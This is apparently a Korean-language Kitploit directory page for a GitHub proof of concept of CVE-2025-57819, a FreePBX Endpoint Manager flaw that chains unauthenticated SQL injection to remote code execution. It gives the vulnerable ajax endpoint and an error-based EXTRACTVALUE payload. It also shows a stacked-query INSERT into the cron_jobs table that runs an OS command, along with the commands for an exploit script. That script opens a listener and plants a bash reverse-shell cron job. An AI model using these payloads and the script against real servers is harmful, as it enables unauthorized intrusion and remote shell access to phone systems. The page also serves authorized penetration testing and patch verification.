Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/b4sh2/cve-2025-57819-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

저장소 보기
72463개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-57819 — FreePBX 인증되지 않은 SQLi → RCE

FreePBX Endpoint Manager 인증되지 않은 SQL 인젝션(CVE-2025-57819)을 FreePBX cron_jobs 테이블을 통한 원격 코드 실행으로 연결하는 원샷 익스플로잇입니다.

승인된 보안 테스트 / CTF 용도로만 사용하세요.


취약점

Endpoint 모듈의 ajax 핸들러는 brand 매개변수를 SQL 쿼리에 직접 연결하며, 모듈 경로 FreePBX\modules\endpoint\ajax는 ajax Referrer/인증 검사를 우회합니다. 이를 통해 인증되지 않은 오류 기반 SQL 인젝션(EXTRACTVALUE 사용)이 가능하며, 스택드 쿼리 쓰기도 가능합니다.

인젝션 지점:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

증명 (오류 기반 읽기):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}

영향: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

RCE 기법

도구 다운로드

인젝션 자체는 읽기 전용이지만, 스택드 쿼리를 통해 쓰기가 가능합니다. FreePBX는 cron 관리자를 통해 cron_jobs 테이블의 작업을 실행하므로, 행을 삽입하면 임의 명령 실행이 가능합니다(약 60초 이내, 스케줄 * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

주입된 명령은 bash 리버스 셸입니다. cron 행은 첫 번째 콜백 이후 자동으로 제거되어 반복 연결을 방지합니다.

요구 사항

root@kitploit:~
pip install requests urllib3

Python 3. 내장 IP 감지(-i/--interface)는 Linux 전용입니다. 다른 플랫폼에서는 --ip를 사용하세요.

사용법

root@kitploit:~
# 기본값: 인터페이스 tun0, 포트 4444 — 리스너 시작, 익스플로잇 실행, 셸 획득
python3 exploit.py http://{target}

# 다른 인터페이스 / 포트 선택
python3 exploit.py http://{target} -i eth0 -p 9001

# 리스너 IP를 명시적으로 설정
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

스크립트의 동작:

  1. SQLi 확인 (DB 버전 유출).
  2. 선택한 포트에서 TCP 리스너 시작.
  3. 리버스 셸 cron 작업 주입 및 행이 생성되었는지 확인.
  4. 약 70초 동안 콜백 대기 후, 대화형 셸 제공 (자동 PTY 업그레이드 시도).
  5. 주입된 cron 행 정리.

참고 자료

  • Horizon3.ai — Updated FreePBX CVEs: Auth Bypass & RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • FreePBX advisory GHSA-m42g-xg4c-5f3h